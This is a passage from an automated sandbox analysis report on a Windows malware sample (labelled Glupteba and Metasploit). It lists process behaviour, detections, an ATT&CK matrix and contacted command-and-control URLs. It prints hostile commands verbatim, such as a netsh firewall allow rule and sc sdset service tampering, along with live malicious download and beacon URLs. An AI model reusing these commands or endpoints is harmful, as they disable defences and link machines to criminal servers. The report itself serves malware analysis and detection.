          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /dJump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5Jump to behavior
          Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to behavior
          Source: C:\Windows\windefender.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
          Source: csrss.exe, 0000000A.00000002.932879909.0000000032450000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: csrss.exe, 0000000A.00000002.932879909.0000000032450000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: csrss.exe, 0000000A.00000002.932879909.0000000032450000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: csrss.exe, 0000000A.00000002.932879909.0000000032450000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,35_2_00007FF6148A96F0
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: try_get_function,GetLocaleInfoW,35_2_00007FF6148A0FD0
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,35_2_00007FF6148A8FF0
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,35_2_00007FF6148A98F8
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,35_2_00007FF6148A9848
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,35_2_00007FF6148A9A24
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,35_2_00007FF6148A0A8C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,35_2_00007FF6148A940C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: EnumSystemLocalesW,35_2_00007FF6148A933C
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,35_2_00007FF6148A94A4
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF6148A5140 cpuid 35_2_00007FF6148A5140
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 35_2_00007FF61488E0C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,35_2_00007FF61488E0C8

          Lowering of HIPS / PFW / Operating System Security Settings:

          barindex
          Uses netsh to modify the Windows network and firewall settingsShow sources
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes
          Modifies the windows firewallShow sources
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C 'netsh advfirewall firewall add rule name='csrss' dir=in action=allow program='C:\Windows\rss\csrss.exe' enable=yes'
          Source: C:\Users\user\Desktop\jkDmft1Qoe.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

          Remote Access Functionality:

          barindex
          Yara detected Metasploit PayloadShow sources
          Source: Yara matchFile source: jkDmft1Qoe.exe, type: SAMPLE
          Source: Yara matchFile source: 25.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.jkDmft1Qoe.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 32.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 25.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 32.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.jkDmft1Qoe.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.0.jkDmft1Qoe.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 34.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 22.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.jkDmft1Qoe.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.0.csrss.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001C.00000002.706688357.0000000000991000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000002.701157645.0000000000991000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000016.00000000.688486387.000000000098A000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.665063886.000000000098A000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.678501947.0000000000991000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000000.719194989.000000000098A000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000000.696859429.000000000098A000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.675526345.000000000098A000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.927094203.0000000000991000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.722563004.0000000000991000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.666674298.0000000000991000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000000.702563257.000000000098A000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000022.00000002.723109037.0000000000991000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.682958367.000000000098A000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000000.657671023.000000000098A000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.699181667.0000000000991000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.706417494.0000000000991000.00000008.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: C:\Windows\rss\csrss.exe, type: DROPPED

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation21Windows Service1Windows Service1Disable or Modify Tools2Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer13Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection112Obfuscated Files or Information11LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsService Execution1Registry Run Keys / Startup Folder11Scheduled Task/Job1Software Packing11Security Account ManagerSystem Information Discovery44SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder11Masquerading33NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol25SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion3LSA SecretsSecurity Software Discovery251SSHKeyloggingData Transfer Size LimitsProxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection112Cached Domain CredentialsVirtualization/Sandbox Evasion3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncProcess Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 504422 Sample: jkDmft1Qoe Startdate: 18/10/2021 Architecture: WINDOWS Score: 100 85 Multi AV Scanner detection for domain / URL 2->85 87 Antivirus detection for URL or domain 2->87 89 Multi AV Scanner detection for dropped file 2->89 91 11 other signatures 2->91 10 jkDmft1Qoe.exe 16 2->10         started        13 csrss.exe 2->13         started        15 csrss.exe 2->15         started        17 7 other processes 2->17 process3 signatures4 103 Modifies the windows firewall 10->103 105 Drops PE files with benign system names 10->105 19 jkDmft1Qoe.exe 11 2 10->19         started        23 csrss.exe 13->23         started        25 csrss.exe 15->25         started        27 csrss.exe 17->27         started        process5 file6 69 C:\Windows\rss\csrss.exe, PE32 19->69 dropped 93 Drops executables to the windows directory (C:\Windows) and starts them 19->93 95 Creates an autostart registry key pointing to binary in C:\Windows 19->95 29 csrss.exe 3 8 19->29         started        34 cmd.exe 1 19->34         started        signatures7 process8 dnsIp9 79 gohnot.com 172.67.196.11, 49816, 80 CLOUDFLARENETUS United States 29->79 81 trumops.com 29->81 83 5 other IPs or domains 29->83 71 C:\Windows\windefender.exe, PE32 29->71 dropped 73 C:\Users\user\AppData\Local\...\injector.exe, PE32+ 29->73 dropped 75 C:\Users\...75tQuerySystemInformationHook.dll, PE32+ 29->75 dropped 77 5 other files (none is malicious) 29->77 dropped 107 Multi AV Scanner detection for dropped file 29->107 109 Machine Learning detection for dropped file 29->109 111 Uses shutdown.exe to shutdown or reboot the system 29->111 113 Uses schtasks.exe or at.exe to add and modify task schedules 29->113 36 injector.exe 29->36         started        39 windefender.exe 29->39         started        41 schtasks.exe 1 29->41         started        49 6 other processes 29->49 115 Uses netsh to modify the Windows network and firewall settings 34->115 43 netsh.exe 3 34->43         started        45 conhost.exe 34->45         started        47 conhost.exe 34->47         started        file10 signatures11 process12 signatures13 97 Multi AV Scanner detection for dropped file 36->97 99 Contains functionality to inject threads in other processes 36->99 51 conhost.exe 36->51         started        53 cmd.exe 39->53         started        55 conhost.exe 39->55         started        57 conhost.exe 41->57         started        101 Creates files in the system32 config directory 43->101 59 conhost.exe 49->59         started        61 conhost.exe 49->61         started        63 conhost.exe 49->63         started        65 2 other processes 49->65 process14 process15 67 sc.exe 53->67         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          jkDmft1Qoe.exe58%VirustotalBrowse
          jkDmft1Qoe.exe34%MetadefenderBrowse
          jkDmft1Qoe.exe47%ReversingLabsWin32.Hacktool.PowerSploit
          jkDmft1Qoe.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Windows\rss\csrss.exe100%Joe Sandbox ML
          B:\EFI\Boot\old.efi (copy)0%ReversingLabs
          B:\EFI\Microsoft\Boot\fw.efi (copy)0%ReversingLabs
          C:\EFI\Boot\EfiGuardDxe.efi0%ReversingLabs
          C:\EFI\Boot\bootx64.efi0%ReversingLabs
          C:\EFI\Microsoft\Boot\bootmgfw.efi0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll46%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll59%ReversingLabsWin64.Trojan.Glupject
          C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe14%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe73%ReversingLabsWin64.Trojan.Glupteba
          C:\Windows\rss\csrss.exe34%MetadefenderBrowse
          C:\Windows\rss\csrss.exe47%ReversingLabsWin32.Hacktool.PowerSploit
          C:\Windows\windefender.exe41%ReversingLabsWin32.Trojan.WinGoRanumBot

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.3.csrss.exe.11920c00.9.unpack100%AviraTR/Patched.Ren.GenDownload File
          50.0.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          46.2.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          46.0.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          10.2.csrss.exe.11c1c000.10.unpack100%AviraTR/Patched.Ren.GenDownload File
          10.2.csrss.exe.11b9c000.9.unpack100%AviraTR/Patched.Ren.GenDownload File
          50.2.windefender.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          gohnot.com6%VirustotalBrowse
          server1.trumops.com6%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
          https://retoti.comidentifier0%Avira URL Cloudsafe
          https://trumops.comServiceVersionServiceVersionServersVersionDistributorIDCampaignIDOSCaption0%Avira URL Cloudsafe
          https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInsta0%Avira URL Cloudsafe
          https://trumops.com/api/logGlobal100%Avira URL Cloudmalware
          http://gohnot.com/370c4779d730135afa0e64399be9936c%100%Avira URL Cloudmalware
          https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-2125560%Avira URL Cloudsafe
          https://logs.trumops.com100%Avira URL Cloudmalware
          https://server1.trumops.comserver1.trumops.com:443server1.trumops.com:443tcpserver1.trumops.comh0%Avira URL Cloudsafe
          https://logs.trumops.comhttps://trumops.com/api/loghttps://server1.trumops.comDistributorIDCampaignI0%Avira URL Cloudsafe
          https://server1.trumops.com/api/pollserver1.trumops.com100%Avira URL Cloudmalware
          https://trumops.com/api/logdefault100%Avira URL Cloudmalware
          https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMic0%Avira URL Cloudsafe
          http://gohnot.com/370c4779d730135afa0e64399be9936c100%Avira URL Cloudmalware
          https://server1.trumops.com/api/poll40ghz100%Avira URL Cloudmalware
          https://server1.trumops.comserver1.trumops.com:443server1.trumops.com:443tcpserver1.trumops.comWinst0%Avira URL Cloudsafe
          https://retoti.com0%Avira URL Cloudsafe
          https://trumops.comif-unmodified-sinceillegal0%Avira URL Cloudsafe
          https://server1.trumops.com/api/poll100%Avira URL Cloudmalware
          http://https://_bad_pdb_file.pdb0%Avira URL Cloudsafe
          https://server1.trumops.com/api/poll40ghzserver1.trumops.com100%Avira URL Cloudmalware
          https://server1.trumops.comc=1a0ceff6e935c933&uuid=server1.trumops.com:443server1.trumops.com:443tcp0%Avira URL Cloudsafe
          https://server1.trumops.com100%Avira URL Cloudmalware
          http://devlog.gregarius.net/docs/ua)Links0%URL Reputationsafe
          https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
          https://server1.trumops.com/api/cdn?c=1a0ceff6e935c933&uuid=8db1a514-f568-41bf-af6a-dffb7cea0346100%Avira URL Cloudmalware
          http://newscommer.com/app/app.exe100%URL Reputationmalware
          https://blockchain.infoindex0%URL Reputationsafe
          http://gohnot.com/370c4779d730135afa0e64399be9936c/watchdog.exe100%Avira URL Cloudmalware
          https://disneyplus.com/legal.0%URL Reputationsafe
          https://trumops.com100%Avira URL Cloudmalware
          https://sitescore.aiValue0%Avira URL Cloudsafe
          https://trumops.com/api/log100%Avira URL Cloudmalware
          http://www.avantbrowser.com)MOT-V9mm/00.620%Avira URL Cloudsafe
          https://trumops.com/api/logmountvol.commountvol.exemountvol.batmountvol.cmdmountvol.vbsmountvol.vbem100%Avira URL Cloudmalware
          http://help.disneyplus.com.0%URL Reputationsafe
          https://server1.trumops.com/bots/post-ia-data?uuid=8db1a514-f568-41bf-af6a-dffb7cea0346100%Avira URL Cloudmalware
          https://server1.trumops.comserver1.trumops.com:443server1.trumops.com:443tcpserver1.trumops.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          gohnot.com
          		172.67.196.11
          		truetrueunknown
          server1.trumops.com
          		172.67.139.144
          		truefalseunknown
          8db1a514-f568-41bf-af6a-dffb7cea0346.uuid.trumops.com
          		unknown
          		unknowntrue
            		unknown
            trumops.com
            		unknown
            		unknowntrue
              		unknown
              logs.trumops.com
              		unknown
              		unknowntrue
                		unknown
                e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://server1.trumops.com/api/polltrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://server1.trumops.com/api/cdn?c=1a0ceff6e935c933&uuid=8db1a514-f568-41bf-af6a-dffb7cea0346true
                  • Avira URL Cloud: malware
                  		unknown
                  http://gohnot.com/370c4779d730135afa0e64399be9936c/watchdog.exetrue
                  • Avira URL Cloud: malware
                  		unknown
                  https://server1.trumops.com/bots/post-ia-data?uuid=8db1a514-f568-41bf-af6a-dffb7cea0346true
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000028.00000003.787075201.000001BD3A19A000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://search.msn.com/msnbot.htm)net/http:jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                    		high
                    https://retoti.comidentifierjkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://trumops.comServiceVersionServiceVersionServersVersionDistributorIDCampaignIDOSCaptionjkDmft1Qoe.exe, 00000000.00000002.669814323.00000000118B8000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comFirstInstallDateFirstInstajkDmft1Qoe.exe, 00000000.00000002.669832232.00000000118C0000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    https://trumops.com/api/logGlobalcsrss.exe, 0000000A.00000002.931442787.000000001199A000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://gohnot.com/370c4779d730135afa0e64399be9936c%csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://trumops.comhttps://retoti.comhttps://trumops.comhttps://retoti.comS-1-5-21-3853321935-212556csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.701750909.0000000011814000.00000004.00000001.sdmp, csrss.exe, 00000016.00000002.704682561.00000000118EA000.00000004.00000001.sdmp, csrss.exe, 00000019.00000002.708360618.00000000118E8000.00000004.00000001.sdmp, csrss.exe, 0000001C.00000002.709694172.00000000118E8000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://search.msn.com/msnbot.htm)msnbot/1.1jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                      		high
                      https://logs.trumops.comcsrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://server1.trumops.comserver1.trumops.com:443server1.trumops.com:443tcpserver1.trumops.comhcsrss.exe, 0000000A.00000002.931399216.000000001195E000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      		low
                      https://logs.trumops.comhttps://trumops.com/api/loghttps://server1.trumops.comDistributorIDCampaignIcsrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      https://server1.trumops.com/api/pollserver1.trumops.comcsrss.exe, 0000000A.00000003.824386748.0000000011A72000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://trumops.com/api/logdefaultcsrss.exe, 0000000A.00000002.931399216.000000001195E000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      https://trumops.comhttps://retoti.comServiceVersionServersVersionDistributorIDCampaignIDOSCaptionMicjkDmft1Qoe.exe, 00000004.00000002.681186282.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.701725692.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000016.00000002.704417862.00000000118DC000.00000004.00000001.sdmp, csrss.exe, 00000019.00000002.708218344.00000000118D6000.00000004.00000001.sdmp, csrss.exe, 0000001C.00000002.709002807.000000001187C000.00000004.00000001.sdmp, csrss.exe, 00000020.00000002.724004382.00000000118BA000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://gohnot.com/370c4779d730135afa0e64399be9936ccsrss.exe, 0000000A.00000003.826104445.0000000011870000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                        		high
                        https://server1.trumops.com/api/poll40ghzcsrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://server1.trumops.comserver1.trumops.com:443server1.trumops.com:443tcpserver1.trumops.comWinstcsrss.exe, 0000000A.00000003.825189031.0000000011998000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		low
                        https://retoti.comjkDmft1Qoe.exe, 00000000.00000002.669832232.00000000118C0000.00000004.00000001.sdmp, jkDmft1Qoe.exe, 00000004.00000002.681186282.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.701725692.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000016.00000002.704417862.00000000118DC000.00000004.00000001.sdmp, csrss.exe, 00000019.00000002.708218344.00000000118D6000.00000004.00000001.sdmp, csrss.exe, 0000001C.00000002.709002807.000000001187C000.00000004.00000001.sdmp, csrss.exe, 00000020.00000002.724004382.00000000118BA000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://trumops.comif-unmodified-sinceillegaljkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://https://_bad_pdb_file.pdbjkDmft1Qoe.exe, 00000000.00000002.667384798.0000000000A5B000.00000008.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000002.678696711.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000000A.00000000.675695591.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000011.00000000.683098871.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000016.00000000.688601668.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 00000019.00000002.706532786.0000000000A5B000.00000008.00020000.sdmp, csrss.exe, 0000001C.00000002.706799259.0000000000A5B000.00000008.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://server1.trumops.com/api/poll40ghzserver1.trumops.comcsrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
